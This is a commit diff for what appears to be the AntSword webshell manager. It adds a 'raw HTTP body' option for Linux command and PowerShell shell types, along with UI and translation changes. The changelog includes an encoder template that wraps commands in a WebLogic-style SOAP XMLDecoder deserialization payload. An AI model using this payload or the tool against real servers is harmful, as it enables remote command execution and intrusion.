Enhance(Modules/ShellManager): 新增配置选项「Body 设置为 RAW 模式」

CHANGELOG.md

@@ -129,6 +129,38 @@
 
 * 修复 PHP SQLite 下自动生成的 sql 语句语法错误的 Bug
 
+* 新增其它配置「Body 设置为 RAW 模式」，目前支持 `CMDLinux` 和 `PSWindows`
+
+> 对于一些命令执行场景，发包时有时只需要纯 Payload, 而不需要键值。 比如复杂的 XML 结构, 此时就可以通过开启该选项，之后结合「编码器」组装 XML 格式 Payload 发送.
+
+比如（注意 Content-Type 需要同步配置）:
+
+```
+'use strict';
+
+module.exports = (pwd, data, ext={}) => {
+  data[pwd] = `<?xml version="1.0" encoding="utf-8"?>
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
+    <soapenv:Header>
+        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
+        <java>
+          <void method="newInstance">
+              <void method="say" id="proc">
+                  <string>${data['_']}</string>
+              </void>
+          </void>
+        </java>
+        </work:WorkContext>
+    </soapenv:Header>
+    <soapenv:Body/>
+</soapenv:Envelope>`;
+  // 删除 _ 原有的payload
+  delete data['_'];
+  // 返回编码器处理后的 payload 数组
+  return data;
+}
+```
+
 ### 系统设置
 
 * 编码管理支持 cmdlinux 类型

source/core/base.js

@@ -11,7 +11,12 @@ const NodeRSA = require('node-rsa');
 const fs = require('fs');
 
 class Base {
-
+  /**
+   * 是否支持 Raw Body
+   */
+  static get supportRawBody() {
+      return false;
+    }
     /**
      * 初始化
      * @param  {Object} opts 配置对象
@@ -30,7 +35,7 @@ class Base {
        * @param  {Object} data 请求数据
        * @return {Object}      生成数据
        */
-      default(pwd, data) {
+      default (pwd, data) {
         data[pwd] = data['_'];
         delete data['_'];
         return data;
@@ -81,7 +86,7 @@ class Base {
       if (priKey.length > 0) {
         key.importKey(priKey.toString(), 'private');
       }
-    } catch (e) { }
+    } catch (e) {}
     return key;
   }
 
@@ -210,7 +215,7 @@ class Base {
     // 解析模板
     for (let funcName in templateObj) {
       this[templateName][funcName] = ((args) => {
-        if (typeof (args) === 'object') {
+        if (typeof(args) === 'object') {
           // 如果脚本函数需要参数，则进行解析
           return (argv) => {
             let data = {};
@@ -312,6 +317,7 @@ class Base {
       rsa: this.rsaEncrypt()
     }
     return new Promise((res, rej) => {
+      console.log(this.__opts__['type'].endsWith("raw") || (this.constructor.supportRawBody && (this.__opts__['otherConf'] || {})['use-raw-body'] === 1))
         // 随机ID(用于监听数据来源)
       const hash = (String(+new Date) + String(Math.random()))
         .substr(10, 10)
@@ -363,7 +369,7 @@ class Base {
           addMassData: (this.__opts__['otherConf'] || {})['add-MassData'] === 1,
           randomPrefix: parseInt((this.__opts__['otherConf'] || {})['random-Prefix']),
           useRandomVariable: (this.__opts__['otherConf'] || {})['use-random-variable'] === 1,
-          useRaw: this.__opts__['type'].endsWith("raw"),
+          useRaw: this.__opts__['type'].endsWith("raw") || (this.constructor.supportRawBody && (this.__opts__['otherConf'] || {})['use-raw-body'] === 1),
           timeout: parseInt((this.__opts__['otherConf'] || {})['request-timeout']),
           headers: (this.__opts__['httpConf'] || {})['headers'] || {},
           body: (this.__opts__['httpConf'] || {})['body'] || {}

source/core/cmdlinux/index.js

 /**
- * PHP服务端脚本模板
- * 开写：2016/04/12
- * 更新：-
- * 作者：蚁逅 <https://github.com/antoor>
+ * CMDLinux 服务端脚本模板
  */
 'use strict';
 
@@ -10,6 +7,9 @@
 const Base = require('../base');
 
 class CMDLINUX extends Base {
+  static get supportRawBody() {
+    return true;
+  }
   constructor(opts) {
     super(opts);
     // 解析模板

source/core/pswindows/index.js

@@ -7,6 +7,9 @@
 const Base = require('../base');
 
 class PSWINDOWS extends Base {
+  static get supportRawBody() {
+    return true;
+  }
   constructor(opts) {
     super(opts);
     // 解析模板

source/language/en.js

@@ -175,6 +175,8 @@ module.exports = {
       },
       otherConf: {
         nohttps: 'Ignore HTTPS certificate',
+        userawbody: 'Use RAW HTTP Body',
+        userawbodyNotSupport: 'The currently selected Shell type does not support RAW Body mode (RAW Shell Type no need it)',
         usemultipart: 'Use Multipart send payload',
         addMassData: 'Add garbage data in payload',
         randomPrefix: 'Random prefix length',

source/language/zh.js

@@ -177,6 +177,8 @@ module.exports = {
       },
       otherConf: {
         nohttps: '忽略HTTPS证书',
+        userawbody: 'Body 设置为 RAW 模式',
+        userawbodyNotSupport: '当前所选Shell类型不支持 RAW Body 模式(RAW类型无需此项设置)',
         usemultipart: '使用 Multipart 发包',
         userandomvariable: '使用随机英文单词变量',
         addMassData: '增加垃圾数据',

source/language/zh_hk.js

@@ -176,6 +176,8 @@ module.exports = {
       },
       otherConf: {
         nohttps: '忽略HTTPS證書',
+        userawbody: 'Body 設置為 RAW 模式',
+        userawbodyNotSupport: '當前所選Shell類型不支持 RAW Body 模式(RAW類型無需此項設置)',
         usemultipart: '使用 Multipart 發包',
         addMassData: '增加垃圾數據',
         randomPrefix: '隨機前綴長度',

source/language/zh_tw.js

@@ -176,6 +176,8 @@ module.exports = {
       },
       otherConf: {
         nohttps: '忽略HTTPS證書',
+        userawbody: 'Body 設置為 RAW 模式',
+        userawbodyNotSupport: '當前所選Shell類型不支持 RAW Body 模式(RAW類型無需此項設置)',
         usemultipart: '使用 Multipart 發包',
         addMassData: '增加垃圾數據',
         randomPrefix: '隨機前綴長度',

source/modules/shellmanager/list/form.js

@@ -273,9 +273,9 @@ class Form {
         let typecombo = form.getCombo('type');
         let lasttype = typecombo.getSelected();
         for (const key in file_match) {
-          if(file_match[key].test(id) == true) {
+          if (file_match[key].test(id) == true) {
             // phpraw jspjs 时不改变类型
-            if(lasttype.indexOf(key)>-1){
+            if (lasttype.indexOf(key) > -1) {
               break;
             }
             typecombo.selectOption(typecombo.getOption(key).index);
@@ -469,8 +469,10 @@ class Form {
    * @return {[type]}     [description]
    */
   _createOtherForm(arg) {
+    let self = this;
     const opt = Object.assign({}, {
       'ignore-https': 0,
+      'use-raw-body': 0,
       'use-multipart': 0,
       'add-MassData': 0,
       'random-Prefix': '2',
@@ -503,6 +505,11 @@ class Form {
           name: 'ignore-https',
           label: LANG['list']['otherConf']['nohttps'],
           checked: opt['ignore-https'] === 1
+        }, {
+          type: "checkbox",
+          name: 'use-raw-body',
+          label: LANG['list']['otherConf']['userawbody'],
+          checked: opt['use-raw-body'] === 1
         }, {
           type: "checkbox",
           name: 'use-random-variable',
@@ -518,7 +525,7 @@ class Form {
           name: 'use-multipart',
           label: LANG['list']['otherConf']['usemultipart'],
           checked: opt['use-multipart'] === 1
-        },{
+        }, {
           type: 'fieldset',
           offsetLeft: 0,
           label: LANG['list']['otherConf']['chunk']['title'],
@@ -636,11 +643,10 @@ class Form {
               })
             });
             return ret;
-          })(['1', '2', '3', '5','10','15'])
+          })(['1', '2', '3', '5', '10', '15'])
         }, {
           type: "label",
           label: LANG['list']['otherConf']['uploadFragment']
-          
         }, {
           type: "combo",
           label: '/kb',
@@ -798,6 +804,17 @@ class Form {
       }], true);
     form.attachEvent('onChange', (name, value, state) => {
       switch (name) {
+        case 'use-raw-body':
+          let chosetype = self.baseForm.getItemValue("type");
+          if (!antSword.core[chosetype].supportRawBody && state == true) {
+            // 不支持，提示
+            layer.open({
+              title: LANG_T['info'],
+              content: LANG['list']['otherConf']['userawbodyNotSupport']
+            });
+            form.uncheckItem('use-raw-body');
+          }
+          break;
         case 'use-multipart':
           if (state == true && form.isItemChecked('use-chunk')) {
             form.uncheckItem('use-chunk');